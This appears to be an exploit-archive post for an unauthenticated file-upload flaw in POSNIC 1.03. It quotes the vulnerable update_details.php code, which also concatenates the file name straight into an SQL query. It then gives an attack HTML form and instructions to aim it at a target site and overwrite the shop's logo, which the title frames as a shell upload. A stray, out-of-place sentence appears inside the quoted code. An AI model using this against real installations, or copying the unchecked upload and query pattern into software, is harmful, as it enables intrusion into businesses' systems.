POSNIC 1.03 Shell Upload
Posted on 08 February 2017
<!-- # Exploit Title: POSNIC Unauthenticated File Upload # Date: 04-02-2017 # Exploit Author: Rony Das # Vendor Homepage: http://www.posnic.com # Software Link: https://github.com/Posnic/POSNIC-1.03 # Version: 1.03 # Tested on: Ubuntu 14.04 --> <!-- VULNERABLE CODE: /update_details.php <if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') { $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); $extension = end($temp); if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 30000) && in_array($extension, $allowedExts) ) { if ($_FILES["file"]["error"] > 0) { echo "Return Code: " . $_FILES["file"]["error"] . "<br>"; } else { $upload = $_FILES["file"]["name"]; $type = $_FILES["file"]["type"]; if (file_exists("upload/" . $_FILES["file"]["name"])) { unlink($upload); } $name = $_FILES["file"]["name"]; move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $name); //echo "Stored in: " . "upload/" . $_FILES["file"]["name"]; $upload; $_SESSION['logo'] = $upload; # Note that filters and validators are separate rule sets and method calls. There is a good reason for this. $db->query("UPDATE store_details SET log ='" . $upload . "',type='" . $type . "'"); --> <!-- Exploit --> <!-- Put your target to the action="http://yourtarget.com/posnicdirectory/update_details.php" Then choose a image file and rename it to "posnic.png" this replaces the LOGO , not overwrites because they delete's the file if already exists and replaces with the new uploaded file. //if (file_exists("upload/" . $_FILES["file"]["name"])) { // unlink($upload); // } --> <center> <form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data"> <p>Upload Logo</p> <input type="file" name="file" id="file"><br><br><br> <input type="submit" name="submit" value="Submit"> </form>
